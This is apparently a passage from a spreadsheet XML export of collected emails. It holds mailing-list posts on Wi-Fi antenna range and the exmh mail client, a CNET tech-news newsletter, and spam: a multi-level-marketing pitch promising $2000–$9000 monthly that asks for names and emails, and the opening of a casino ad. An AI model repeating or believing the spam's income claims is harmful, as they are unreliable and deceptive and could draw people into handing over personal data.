 prior permission: contact &lt;TheEditor@worldwidewords.org&gt;.
 -------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I think what you're looking at with the dual antenna mounts is a 
 diversity antenna.  It won't work too well with one hooked up to the 
 pringles can and the other hooked up to a regular rubber duck.
 -Ian.
 On Tuesday, October 1, 2002, at 01:04 PM, Eugen Leitl wrote:
 &gt;
 &gt; 1) reinforced concrete shields like the dickens; wood lots less so
 &gt; 2) line of sight is best (o'really?)
 &gt; 3) if you want to boost range, use directional aerials, not omnis
 &gt;
 &gt; Direct line of sight (no trees, no nothing) can give you ~10 km with 
 &gt; well
 &gt; aligned directional aerials (and, say, no sleet, no locusts, nor rain 
 &gt; of
 &gt; blood). If you want to fan out afterwards, use a bridge of a 
 &gt; directional
 &gt; coupling to an omni. 802.11a should shield within building lots more 
 &gt; than
 &gt; 802.11b, ditto line of sight with lots of precipitation inbetween.
 &gt;
 &gt; On Tue, 1 Oct 2002, Damien Morton wrote:
 &gt;
 &gt;&gt; I just bought a LinkSys BEFW1154v2 Access Point Router for $150
 &gt;&gt; (http://www.linksys.com/products/product.asp?grid=22&amp;prid=415). Im 
 &gt;&gt; doing
 &gt;&gt; some dev work on a Symbol PocketPC device with built in 802.11b.
 &gt;&gt;
 &gt;&gt; In this 600 sq ft pre-war New York apartment it goes through 2 or 3
 &gt;&gt; walls, into the hallway and halfway down the first flight of stairs
 &gt;&gt; before it loses contact with the base station. That's less than 50 ft.
 &gt;&gt; Inside the apartment, it works just fine.
 &gt;&gt;
 &gt;&gt; I just did some further testing - through 2 brick walls the range is
 &gt;&gt; about 25 feet. The signal also goes through the roof pretty much
 &gt;&gt; unimpeded.
 &gt;&gt;
 &gt;&gt; That said, the Symbol device doesn't have an antenna to speak of, and 
 &gt;&gt; I
 &gt;&gt; havent done any tweaking to try to extend the range.
 &gt;&gt;
 &gt;&gt; The Linksys unit has two antenna mounts - you could leave one as an 
 &gt;&gt; omni
 &gt;&gt; antenna while hooking up a directional antenna to the other.
 &gt;&gt;
 &gt;&gt; You might find that you have to use several access points and/or
 &gt;&gt; repeaters to get the coverage you want.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Linking message [was: Re: Patch to complete a change...]
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue Sep 10 2002 at 12:52, Robert Elz wrote:
 &gt; Subject: Patch to complete a change...
 &gt; I guess that most of us don't use "link" very often ... I noticed it
 &gt; last week, but only got time to look and see why today.
 I would like to use [Link] a lot more, but is it rather
 inconvenient.
 I have set my right mouse button to [Move] a message to another
 folder, which works fine.
 However, [Link] also uses the same destination folder as [Move], and
 so if I want to use [Link] I first have to mark the destination
 folder with a message-move, undo the move, then I can use the
 [Link].  Very inconvenient.
 Is there a better way for me to set this up so that [Link] works
 with one or two simple clicks?
 (In essence: is there a way to mark a destination folder for a
 message link or move without actually doing a move or link, I
 couldn't see anything obvious).
 Cheers
 Tony
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET NEWS.COM: Copies, Webcasts tangled in draft bill
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Copies, Webcasts tangled in draft bill &lt;/title&gt;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href="http://clickthru.online.com/Click?q=1b-wAnhI3N2I6Ju9P3Q1U5MauO37xrR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsDV-d7VuyLxjkqVAXXblR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=46-19zwInpDS3jY89aa1cN0535V0Y9R" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDUT4TY15xCjjvDSwizzcR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6VKPoOE7Kns2asfI8UkRR"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11, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Copies, Webcasts tangled in draft bill &lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Sharp's Zaurus PDA suffers security holes&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Outlook plug-in could let the hackers in&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 ACLU: Don't rat out your customers&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Shareholders sue PayPal, eBay&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Ellison: I don't need an understudy&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Vision Series&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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Read News.com's exclusive interviews of 10 top CIOs.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KQfYObyyhaf70SVbToBBPR" &gt;Vision Series home&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;Copies, Webcasts tangled in draft bill &lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Legislators are readying a bill that could sharply limit Americans' rights relating to copying music, taping TV shows, and transferring files through the Internet.
 At the same time, the draft legislation seen by CNET News.com would place the struggling Webcasting industry on firmer legal footing.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002, 11:35 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBGS6VsaAFigi7yr9FKgnR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Sharp's Zaurus PDA suffers security holes&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Sharp's Linux-based, business-oriented Zaurus handheld suffers from security holes that could let hackers grab private data off a corporate network, according to researchers at Syracuse University.
 In an advisory posted Wednesday to a Syracuse University computer-science Web site, researchers said they had found vulnerabilities in Sharp's Zaurus SL-5500 and Zaurus SL-5000D handhelds. The flaws let attackers take control of the device's file system, giving them the power to overwrite files or lock the device so no data can be input through the keypad or touch screen.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002, 12:50 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJr-YFQffXdxQMKtNX8PQiR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;Outlook plug-in could let the hackers in&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 A widely used plug-in for Microsoft's Outlook e-mail client that lets users encrypt and digitally sign messages has inadvertently weakened security and left the mail program open to attack.
 Security company eEye Digital Security issued a warning late Wednesday to users of Network Associates' Pretty Good Privacy (PGP) plug-in for Outlook, saying that a vulnerability in the add-on could let attackers execute malicious software on a victim's computer. Network Associates released a patch for the problem Wednesday as well.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002, 11:05 AM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaFARJ3JTzSROUJEymxqPR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;ACLU: Don't rat out your customers&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 A clutch of civil liberties groups is asking small Internet service providers to get a backbone and stand up to companies seeking to unveil anonymous critics.
 A group including the Electronic Frontier Foundation, the American Civil Liberties Union (ACLU), and the Center for Democracy and Technology is urging ISPs to alert customers when they are the targets of so-called John Doe legal actions, which try to unmask the identities of people who anonymously air their companies' dirty laundry. The group has sent letters to more than 100 ISPs, asking them to adopt a written policy promising to let customers know if they're targets.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002, 12:35 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq_yDGts5bjsMVKpv3DxnR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Shareholders sue PayPal, eBay&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The PayPal-eBay merger has hit an early snag: Two shareholder lawsuits have been filed against the companies seeking to block the deal.
 The lawsuits, each filed in Delaware Chancery Court earlier this week on behalf of PayPal shareholders, charge that the deal represents a breach of the companies' fiduciary duty to those shareholders and that the price eBay is paying for PayPal is unfair and inadequate, the companies said in separate regulatory filings on Thursday.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002, 11:50 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvcfT2BIqBxDVAmoBameR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Ellison: I don't need an understudy&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Deflecting continuing calls for a No. 2 executive, Oracle Chief Executive Larry Ellison said again Wednesday that the company does not need anyone to back him up.
 Ellison, responding primarily to recent news stories that the company might need a second in command, said the current team is enough to guide Oracle.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002, 6:05 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXF_0PZdS98BbBL7kOi_yR"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&lt;b&gt;Meet Microsoft, home networker&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The Colossus of Redmond's next bold move is into routers that'll let consumers connect their digital devices together and to the Net.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXOl10dmFKMZ2Fz8IR7XlR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;Sprint: Not out, but winded&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 While it's hardly the next WorldCom, slowing wireless growth and red ink in long-distance are hardly fuel for its stock.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK8vC56PpQktQ3DlPfP8N4R"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href="http://clickthru.online.com/Click?q=43-coL5IBJAEL-kllS9Z5VKc-3P0BcR"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href="http://clickthru.online.com/Click?q=59-y53oIEnthwPksNglpW-B_KMqztFR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2GdKeb4QA5K-fxuEL59R"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href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lcSbjgVtuoAABMMPZ9rR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_zabLfI7slCW5CH7esbKRiR"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href="http://clickthru.online.com/Click?q=ad-_4IAQzEB4q40-34QhaIHsSzky0PR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEk7XTPmn4gVnxXFZcIuInR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkVXgKk79RmBekeVktk2eR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2A7TvhPk1kOqFb2GVaGyR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8-SBgl8-_XGuwrfzJ6nnR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=17-agitI5XrfGR04bnIz4s1RhjGRseR"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src="http://news.cnet.com/i/ne/bb/2002/07/0710_e911.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0D7TBv2bHc-r7MBvWpjuyR" &gt;Tech hurdles ahead for e911&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Correspondent Melissa Francis looks at the technology hurdles facing wireless carriers in launching the second phase of the e911 initiative by October.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKImb5QL1fU5CfCkxHB0FFR" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=56-NwKYInns9S0vBFErctPQDwwaMC9R"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href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcwpPGOOK80ywQ-4d0P6cR" &gt;
 'Father of Pentium' sets up India VC fund&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0Kir7FT6IoaDkjVsTLZ8iR" &gt;
 EMC lures HP exec to technology post&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJorh5tror1yZeU_u_KnPR" &gt;
 Japan's major chipmakers join forces&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr2MfO_1FWLXZBXqONOVnR" &gt;
 Stocks tumble to new lows&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZrsdJpab45w8PF_jEuwteR" &gt;
 Expedia snubs parent company's bid&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1asN7b22HCu4jNix1DPPR" &gt;
 Earnings alert: Yahoo back in black&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4N6jvQHzAwQ4lAUw-5WnR" &gt;
 KPN says it will unplug KPNQwest network&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4ei4y6wnZxrhBm0WHtheR" &gt;
 Verizon to ask NorthPoint claim get tossed&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zaHLcycd8ZvQIzTKtR1yR" &gt;
 WorldCom won't pay MCI shareholders&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAHEkIeIdNyGEI9rCM8vlR" &gt;
 Lawmakers: Keep your tunes to yourself&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXe2TtxIN_7DQESNPe-i4R" &gt;
 Movielink: Bring on the experts&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6pnIzcAujHpx8lOheMncR" &gt;
 Web users ante up for games, classmates&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPhLuhI--ywvjsK-FdLPRR" &gt;
 Teen handheld maker wants to play&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPdjION5cUywq2NRJSBTZR" &gt;
 RIM files second suit against Good&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzTtqO1HwHzeFOPq1FsnynR" &gt;
 Gamers invade Army Web site&lt;/a&gt;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href="http://clickthru.online.com/Click?q=a8-02XZQQZk8cn8LHTDtZs6swzdONiR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=bd-c0rUrzpL9LD7ntDzAE_s0Q2tgSy3-9RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULwlG7cAla3Gl22vbAOyenR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXfH-IRb_VqS8CMB0qvseR"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href="http://clickthru.online.com/Click?q=fc-WpHmQVwF4FRLGpea9-0t3VVat9yR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-4W8ZmUp2X3VynhNBuCqlR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMHfePLOYsBBBkqU8niQ74R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdHJgbdWEyFPcZsjpRp-LrR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPuvTFhbjJlh9GpMUHM3FR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDCiXgO-lWhKPAKa1CPIuR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e433&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=7c-7N6ZnFW8c3KmBTvyE3Kh2RYFZRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Create a PAYCHECK with your COMPUTER and Enjoy Cheap ISP &amp; shopping Discount.
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi -
 ( http://club.4tfox.com )
 You get emails every day, offering to show you how to make money.
 Most of these emails are from people who are NOT making any money.
 And they expect you to listen to them?
 Enough.
 If you want to make money with your computer, then you should
 hook up with a group that is actually DOING it.  We are making
 a large, continuing income every month.  What's more - we will
 show YOU how to do the same thing.
 This business is done completely by internet and email, and you
 can even join for free to check it out first.  If you can send
 an email, you can do this.  No special "skills" are required.
 How much are we making?  Anywhere from $2000 to $9000 per month.
 We are real people, and most of us work at this business part-time.
 But keep in mind, we do WORK at it - I am not going to 
 insult your intelligence by saying you can sign up, do no work,
 and rake in the cash.  That kind of job does not exist.  But if
 you are willing to put in 10-12 hours per week, this might be
 just the thing you are looking for.
 This is not income that is determined by luck, or work that is
 done FOR you - it is all based on your effort.  But, as I said,
 there are no special skills required.  And this income is RESIDUAL -
 meaning that it continues each month (and it tends to increase
 each month also).
 Interested?  I invite you to find out more.  You can get in as a
 free member, at no cost, and no obligation to continue if you
 decide it is not for you.  We are just looking for people who still
 have that "burning desire" to find an opportunity that will reward
 them incredibly well, if they work at it.
 To grab a FREE ID# and have more information, simply go to the 
  web address http://club.4tfox.com  and send me an email with following 
  informtion
 "Send me a free membership!"
 Be sure to include your:
 1. First name
 2. Last name
 3. Email address (if different from above)
 We will confirm your position and send you a special report
 as soon as possible, and also Your free Member Number.
 If you are not interested in tring to Earn Money,  :)
 you are interested in the huge discount from the 140 Online Shops,
 Very Cheap ISP package and many many more,
 You can also go to the web address:
 http://club.4tfox.com/#id-GreatService
 That's all there's to it.
 We'll then send you info, and you can make up your own mind.
 Looking forward to hearing from you!
 Sincerely, 
 Hugh Zou
 P.S. After having several negative experiences with network
 marketing companies I had pretty much given up on them.
 This is different - there is value, integrity, and a
 REAL opportunity to have your own home-based business...
 and finally make real money on the internet.
 Don't pass this up..you can sign up and test-drive the
 program for FREE.  All you need to do is get your free
 membership.
 Unsubscribing: Send a blank email to: removemefromlist@bigfoot.com with
 "Remove" in the subject line.  By submitting a request for a FREE
 DHS Club Membership, I agree to accept email from the DHS Club for
 both their consumer and business opportunities.
 3619ezfT0-011VpTm2924l20
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-695600198P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Robert Elz &lt;kre@munnari.OZ.AU&gt;
 &gt; Date:  Wed, 28 Aug 2002 21:06:30 +0700
 &gt;
 &gt; It may be that your new sequence method just exposed the bug that had been
 &gt; there all along.
 *grin*  That's what the past 3 or 4 months of exmh hacking has been all about 
 for me.
 I've now stabilized everything pretty well for my paid job, so I'll probably 
 poke around at the sequences performance issues, but rather than checking 
 changes in, I'll email anything I figure out since I'm leaving town in less 
 than 48 hours.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-695600198P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9bNyqK9b4h5R0IUIRAl7bAJ9ZjEqTQ4/rok/bB4bhULQSSqUADACdGdHI
 egb2mI4CHykNVjHsUq07F3s=
 =gxds
 -----END PGP SIGNATURE-----
 --==_Exmh_-695600198P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; 
 &gt; 
 &gt; &gt;&gt;&gt;&gt;&gt; On Tue, 8 Oct 2002, "Dag" == Dag Nygren wrote:
 &gt; 
 &gt;   Dag&gt; but when procmail runs it it doesn't, presumably as it
 &gt;   Dag&gt; doesn't have the authorization to communicate with the
 &gt;   Dag&gt; laptop, beeing another user?
 &gt; 
 &gt; I don't know anything about the KDE sound server but I'd guess 
 &gt; your problem is the "environment" in which procmail runs.  You 
 &gt; don't say what procmail is running from.  In my case, for 
 &gt; example, procmail is run from fetchmail which is run by a cron 
 &gt; job.
 Sorry about that,
 procmail is run by the qmail delivery agent to presort all mail
 I get.
 But anyway, I found an error message in procmail.log, which solved
 the problem.
 The following line in my delivery script seems to work fine now:
 DISPLAY=&lt;laptop&gt;:0.0 artsplay &lt;soundfile&gt;
 Thanks
 Dag
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get big money at this Casino site
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Maxim Casino ad&lt;/TITLE&gt;
 &lt;META content="text/html; charset=iso-8859-1" http-equiv=Content-Type&gt;
